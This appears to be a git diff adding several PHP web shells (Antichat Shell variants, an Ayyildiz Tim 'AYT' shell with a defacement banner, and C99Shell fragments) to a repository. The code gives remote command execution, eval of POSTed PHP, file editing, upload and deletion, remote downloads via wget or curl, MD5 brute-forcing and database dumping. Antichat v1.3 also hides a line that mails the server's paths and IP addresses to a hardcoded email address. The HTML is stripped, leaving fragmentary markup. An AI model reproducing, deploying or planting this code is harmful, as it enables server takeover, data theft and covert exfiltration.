+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+
+
+
+echo "
Decrypte MD5
+
 MD5 õåø:".$pass_de."
 Ïåğåáîğ áóêâ:
ENG:
+[a-z]
+[A-Z]

+[0-9]
+[Ñèìâîëû]


+RUS:
+[à-ÿ]
+[À-ß]
+

 
+

+
+
+
+
Ğåçóëüòàò âûïîëíåíèÿ ïåğåáîğà ïàğîëåé:
Çàõåøèğîâàííûé ïàğîëü:  $word
Íà÷àëî ïåğåáîğà:  $dat - $date
Îêîí÷àíèå ïåğåáîğà:  $dat2 - $date2
Âûïîëíåíèå ïåğåáîğà õåøåé çàïèñàí â ôàéë:  ".$word."_md5
";
+
+
+
+$f=@fopen($word._md5,"a+");
+fputs($f,"Õıø èç MD5 [$pass_de] = $word 
+Íà÷àëî ïåğåáîğà:\t$dat - $date 
+Îêîí÷àíèå ïåğåáîğà:\t$dat2 - $date2");
+exit;
+}}
+
+//Mysql
+
+if($action=="mysql"){
+if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     $content.="
Ãîòîâî! Äàìï ïğîøåë óäà÷íî!
";
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+    else $content.="
Òàêîé ÁÄ íåò!
";
+   @mysql_close($db);
+   } 
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { $content.="
ÎØÈÁÊÀ, íåò ïğàâ çàïèñè â ôàéë!
"; }
+
+$content.="

+
+ Áàçà: 
+
+
 Ñîõğàíèòü äàìï â ôàéëå: $str[0]
";
+@$tc++;
+}
+$content.="
+
+
+
+
+
+
+
+
+
+
+";
+
+@$base=$_POST['base'];
+@$db=$_POST['db'];
+$content.="

[Âñåãî òàáëèö: $tc]";
+if($base){
+$content.="

Òàáëèöà: [$tbl]
";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+$content.="[$records[0]]$str[0]
";
+
+mysql_free_result($c);
+}}
+$content.="

+
+
+
+
+
+
+
+
+
+
+
+
+
";
+
+@$vn=$_POST['vn'];
+$content.= "		Áàçà äàííûõ: $db => $vn
";  
+@$inside=$_POST['inside'];
+@$tbl=$_POST['tbl'];
+if($inside){
+$content.= "";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+$content.= "Âñåãî: $cfa[0]
+
+
+Îò: 
+Äî: 
+
+
+
+
+
+
+
+
+
+
+
+";
+@$vn=$_POST['vn'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i$lee) {
+$nst_inside=htmlspecialchars($lee);
+$content.= "\r\n";
+} 
+}
+mysql_free_result($result);
+$content.= "
 $nst_inside
";
+}}}
+
+//end function
+
+?>
.| Shell |. .| Viewer |..| Editor |..| Upload |..| Brute |..| Mysql Dumper|..| Php Eval |..| <-back |..| forward->|.

 
Safe mode: 
Disable functions: 
OS: 
Server: 
Id: 

 Status: 

+
| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by Go0o$E |

diff --git a/php/Antichat Shell.php b/php/Antichat Shell.php
new file mode 100644
index 0000000..01702a8
--- /dev/null
+++ b/php/Antichat Shell.php	
@@ -0,0 +1,366 @@
+
+BODY{
+  background-color: #2B2F34;
+  color: #C1C1C7;
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  MARGIN-TOP: 0px;
+  MARGIN-BOTTOM: 0px;
+  MARGIN-LEFT: 0px;
+  MARGIN-RIGHT: 0px;
+  margin:0;
+  padding:0;
+  scrollbar-face-color: #336600;
+  scrollbar-shadow-color: #333333;
+  scrollbar-highlight-color: #333333;
+  scrollbar-3dlight-color: #333333;
+  scrollbar-darkshadow-color: #333333;
+  scrollbar-track-color: #333333;
+  scrollbar-arrow-color: #333333;
+}
+input{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+select{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+textarea{
+  background-color: #333333;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+a:link{
+  
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:visited{
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:hover, a:active{
+  width: 100%;
+  background-color: #A8A8AD;
+  
+
+  color: #E7E7EB;
+  text-decoration: none;
+  font-size: 8pt;
+}
+td, th, p, li{
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  border-color:black;
+}
+';
+$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.'';
+$footer='';
+
+//error parser
+$filext="File already exists.";
+$uploadok="File was successfully uploaded.";
+$dircrt="Dir is created.";
+$dircrterr="Don't create dir.";
+$dirnf="Dir not found.";
+$empty="Directory not empty or access denide.";
+$deletefileok="File deleted";
+$deletedirok="Dir deleted";
+//end error parser
+
+//auth
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+if(@$_SESSION['an']==0){
+echo $header;
+echo '
Login:
Password:
';
+echo $footer;
+exit;}
+//end auth
+
+function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
+
+
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+
+$dir=chdir($dir);
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+
+
+
+
+
+//crdir
+
+
+if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+  
+//Current type OS
+if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
+
+
+
+ 
+ 
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $msgnotice.=$deletefileok;
+}
+//end delete
+
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
+
+}
+//end delete
+?>
+
+ 
+
+

+
+
+
+
+
+
+
+
+
+
+
| Shell | Viewer| Editor| Upload| Php Eval| EXIT | <-back | forward->|


+

+
+
+
+

+
+";
+  if($GLOBALS['win']==1)echo $form_win;
+  if($GLOBALS['win']==0){
+    echo $form_win;
+	echo '';	
+}
+
+if(@$_POST['uploadloc']){
+if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(!file_exists($dirupload)){createdir($dirupload);}
+if(file_exists($uploadfile))echo $GLOBALS['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+echo $GLOBALS['uploadok'];
+}
+
+if(@$_POST['upload']){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:
+	  shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
+	  break;
+ 	  case fetch:
+ 	  shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
+ 	  break;
+ 	  case lynx:
+ 	  shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case links:
+ 	  shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case GET:
+ 	  shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case curl:
+ 	  shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
+ 	  break;
+	 }
+	}
+  
+}
+//end upload section
+
+
+if($action=="phpeval"){
+ echo "
+
+ 
+ <?php

+

+?>

+";} 
+if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
+?>
+

+
+
+
+
+

+

+";}
+//end shell
+
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+
+
+		
+echo "";
+echo "";
+
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+
+
+if ($GLOBALS['win']==1) {
+echo "";
+}
+echo "
+";
+for($i=0;$i';  
+  }
+for($i=0;$i
+
+
+'; 
+}
+echo "
Open directory:
Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo ' '.chr($j).'';
+ echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'X
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).'
+D
+E
+X
";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if(@$_POST['save'])writef($file,$_POST['data']);
+echo "

+
+
+

+
";
+}
+//end editors
+
+//upload
+if($action=="upload"){
+  if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="
Upload to dir:
New file name:
File addres:
+
COPYRIGHT BY ANTICHAT.RU 

+
\ No newline at end of file
diff --git a/php/Antichat_Shell_v1.3.php b/php/Antichat_Shell_v1.3.php
new file mode 100644
index 0000000..72ea5cb
--- /dev/null
+++ b/php/Antichat_Shell_v1.3.php
@@ -0,0 +1,180 @@
+BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}';
+$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.'';
+$footer='';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '
Login:
Password:
';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+ 
+

+
+
+
+
+
+
| Shell | Viewer| Editor| EXIT |


+

+
+
+
+

+
+

+
+
+
+

+

+";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "";
+echo "";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "";
+}
+echo "
+";
+for($i=0;$i';  
+  }
+for($i=0;$i
+
+'; 
+}
+echo "
Open directory:
Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo ' '.chr($j).'';
+ echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).'
+D
+E
";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "

+
+
+

+
";
+}
+//end editors
+?>
+
COPYRIGHT BY ANTICHAT.RU 

+
diff --git a/php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php b/php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php
new file mode 100644
index 0000000..120f5df
--- /dev/null
+++ b/php/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php	
@@ -0,0 +1,317 @@
+
+
+
+
+
+
+Ayyildiz Tim  | AYT | Shell v 2.1 Biz Büyük Türk Milletinin Hizmetindeyiz...
+
+
+
+
+
+
+
+
+
+
+ 
+
+
+
+
+
+HACKED BY AYYILDIZ ™
+ 
+
+
+
+
+
+
+
+

+ 
+ 

+      
+    

+      

+
+
+      

+      
  

+      

+      
+      
+
+
+
+
+
+
+Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?>
+
+
+
+

+  
+    
+      
+    
+  

+        
          
+        

+        

+          
Bulundugunuz Dizin: 
+            Root/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('%s/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?>
+          

+          
Dizin Degistir :
+              
+          

+          
Komut:
+              
+              
+          

+          
Surekli Bagli Kal  
+            
+          

+          
+        

+              
+          

+        

+        

+            
+        
      
      
Copyright © 2006–2007, Powered  byThehacker. v 2.1 - www.ayyildiz.org 

+        
 Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.

+        
 

+

+
+
+
+
+
+
+
+
+
+
+
+
!C99Shell v. !
Software:  
uname -a:  
 
Safe-mode: 
Directory: ";
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "".htmlspecialchars($b)."/";
+ $i++;
+}
+echo "   ";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "[ ok ]";
+ echo "".view_perms(fileperms($d))."";
+}
+else
+{
+ $wd = false;
+ $wdt = "[ Read-Only ]";
+ echo "".view_perms(fileperms($d.$f))."";
+}
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "
Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
";
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "".$item[0]."    ";
+ }
+}
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+   if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";}
+   else {$letters .= "[ ".$letter." ] ";}
+  }
+ }
+ if (!empty($letters)) {echo "
Detected drives: ".$letters;}
+}
+?>


";
+ if (!$sql_sock) {?>
SQL Manager:
";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "
Can't connect
"; echo "".$err."";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ 
+  echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
";
+
